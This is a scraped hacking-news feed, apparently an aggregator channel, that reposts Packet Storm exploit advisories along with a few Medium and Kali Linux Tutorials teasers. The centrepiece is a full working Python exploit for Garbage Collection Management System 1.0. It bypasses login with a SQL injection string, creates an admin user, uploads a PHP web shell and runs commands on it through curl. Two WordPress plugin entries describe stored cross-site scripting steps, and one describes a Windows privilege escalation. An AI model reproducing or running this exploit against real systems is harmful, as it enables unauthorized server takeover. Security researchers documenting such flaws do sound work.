Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress WPFront Notification Bar 1.9.1.04012 Cross Site Scripting
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
WordPress WPFront Notification Bar plugin version 1.9.1.04012 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
WordPress WPFront Notification Bar 1.9.1.04012 Cross Site Scripting
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
WordPress WPFront Notification Bar plugin version 1.9.1.04012 suffers from a persistent cross site scripting vulnerability.
MD5 |
0a33f701a76c573d9c89e82964d46175Download
# Exploit Title: WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)
# Date: 11/07/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/wpfront-notification-bar/
# Version: 1.9.1.04012
# Tested on Windows
# Category: Web Application
How to reproduce vulnerability:
1. Install WordPress 5.7.2
2. Install and activate *WPFront Notification Bar* plugin.
3. Navigate to *WPFront Notification Bar *>> Setting >> notification bar and
fill the required data and enter the below-mentioned payload into the Custom
CSS user input field.
5. You will observe that the payload successfully got stored into the
database and when you are triggering the same functionality in that time
JavaScript payload is executing successfully and we are getting a pop-up.
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Garbage Collection Management System 1.0 Shell Upload / SQL Injection
https://4.bp.blogspot.com/-rlkVZrkp7Nk/WWlvMMd1AsI/AAAAAAAAIMM/kgTZoxpDP8Ypbt5o2Ma3tAKenLk3_TLPQCLcBGAs/s1600/h18.png
Garbage Collection Management System version 1.0 shell upload exploit that leverages a SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Garbage Collection Management System 1.0 Shell Upload / SQL Injection
https://4.bp.blogspot.com/-rlkVZrkp7Nk/WWlvMMd1AsI/AAAAAAAAIMM/kgTZoxpDP8Ypbt5o2Ma3tAKenLk3_TLPQCLcBGAs/s1600/h18.png
Garbage Collection Management System version 1.0 shell upload exploit that leverages a SQL injection vulnerability.
MD5 |
ea34ecce44fb54eefcd9fffe39d45a35Download
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload
# Date: 05-07-2021
# Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
# POC: https://www.exploit-db.com/exploits/50085
# Tested On: Ubuntu 21.04 + Apache/2.4.46 (Ubuntu)
# Version: 1.0
#======================================================
#imports
from requests_toolbelt.multipart.encoder import MultipartEncoder
import requests
import string
import random
import os
import argparse
#generate random string 8 chars
def randomGen(size=8, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))
#generating a random username and a random web shell file
user=randomGen()
shellFile=randomGen()+".php"
#creating a payload for the login
payload = {
"username":"a",
"password":"a' OR 1=1 AND ucat='admin' #"
}
proxies = {"http":"http://127.0.0.1:8080"}
session=requests.Session()
#changeme
urlBase="http://172.27.1.71/Gabage/"
url=urlBase+"login.php"
print("=== executing SQL Injection ===")
req=session.post(url,payload,allow_redirects=False)
cookie=req.headers["Set-Cookie"]
print("=== authenticated admin cookie:" + cookie + " ===")
url=urlBase+"apatient/users.php?user=rayat"
mp_encoder = MultipartEncoder(
fields = {
"fullname":user,
"ucat":"admin",
"contact":"0000000000",
"address":"aaa ave",
"username":user,
"acstatus":"active",
"date":"2021-07-05",
"password":user,
"image":(shellFile,"<?php","application/x-php"),
"submit":""
}
)
headers = {
"Cookie":cookie,
'Content-Type': mp_encoder.content_type
}
print("=== creating user " + user + " and uploading shell " + shellFile +" ===")
req=session.post(url,data=mp_encoder,allow_redirects=False,headers=headers) #,proxies=proxies)
#curl the shell for test
requestUrl = "curl " + urlBase + "apatient/contract/"+shellFile+"?cmd=whoami"
print("=== issuing a whoami: " + requestUrl + " ===")
print("===CURL OUTPUT===")
os.system(requestUrl)
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Microsoft Windows CreateProcessWithLogon Write Restricted Service Privilege Escalation
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
Microsoft Windows has an issue where you can use the CreateProcessWithLogon API to escape a write restricted service and achieve full write access as the service user.
MD5 |
Download
Source:packetstormsecurity.com
Microsoft Windows CreateProcessWithLogon Write Restricted Service Privilege Escalation
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
Microsoft Windows has an issue where you can use the CreateProcessWithLogon API to escape a write restricted service and achieve full write access as the service user.
MD5 |
00f7a019dea4bf3a1d19442fae579890Download
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Current Book 1.0.1 Cross Site Scripting
https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
WordPress Current Book plugin version 1.0.1 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
WordPress Current Book 1.0.1 Cross Site Scripting
https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
WordPress Current Book plugin version 1.0.1 suffers from a persistent cross site scripting vulnerability.
MD5 |
9e6e35a0f251dadb33e65deae120dd38Download
# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
# Date: 14/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/current-book/
# Version: 1.0.1
# Category: Web Application
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Custom Book
3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
4. Click Update Options
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Ipa-Medit : Memory Search And Patch Tool For Resigned Ipa Without Jailbreak
Ipa-medit is a memory search and patch tool for resigned ipa without jailbreak. It was created for mobile game security testing. Motivation Memory modification is the easiest way to cheat in games, it is one of the items to be checked in the security test. There are also cheat tools that can be used casually […]
The post Ipa-Medit : Memory Search And Patch Tool For Resigned Ipa Without Jailbreak appeared first on Kali Linux Tutorials.
Ipa-Medit : Memory Search And Patch Tool For Resigned Ipa Without Jailbreak
Ipa-medit is a memory search and patch tool for resigned ipa without jailbreak. It was created for mobile game security testing. Motivation Memory modification is the easiest way to cheat in games, it is one of the items to be checked in the security test. There are also cheat tools that can be used casually […]
The post Ipa-Medit : Memory Search And Patch Tool For Resigned Ipa Without Jailbreak appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Can the US do more to prevent cyber attacks from happening in 2021? (6/20/20)
As we reach the midpoint of the year, with 2 major cyber-attacks and executive legislation signed into office by President Biden, a lot…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Can the US do more to prevent cyber attacks from happening in 2021? (6/20/20)
As we reach the midpoint of the year, with 2 major cyber-attacks and executive legislation signed into office by President Biden, a lot…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Can the US do more to prevent cyber attacks from happening in 2021? (6/20/20)
As we reach the midpoint of the year, with 2 major cyber-attacks and executive legislation signed into office by President Biden, a lot are…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
O que são Hacks de Marketing Digital?
https://cdn-images-1.medium.com/max/600/1*KsQNz63fiiNVjVG6_FoHrA.jpeg
Hacks é uma palavra muito mal vista na internet por estar associada a palavra hacker
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
O que são Hacks de Marketing Digital?
https://cdn-images-1.medium.com/max/600/1*KsQNz63fiiNVjVG6_FoHrA.jpeg
Hacks é uma palavra muito mal vista na internet por estar associada a palavra hacker
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
O que são Hacks de Marketing Digital?
Hacks é uma palavra muito mal vista na internet por estar associada a palavra hacker
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How i would hack you and attack you
https://cdn-images-1.medium.com/max/2600/0*NkWEjUYD4AF6hB1_
I hope this will help some of you see just how vulnerable you can be
Continue reading on Medium »
How i would hack you and attack you
https://cdn-images-1.medium.com/max/2600/0*NkWEjUYD4AF6hB1_
I hope this will help some of you see just how vulnerable you can be
Continue reading on Medium »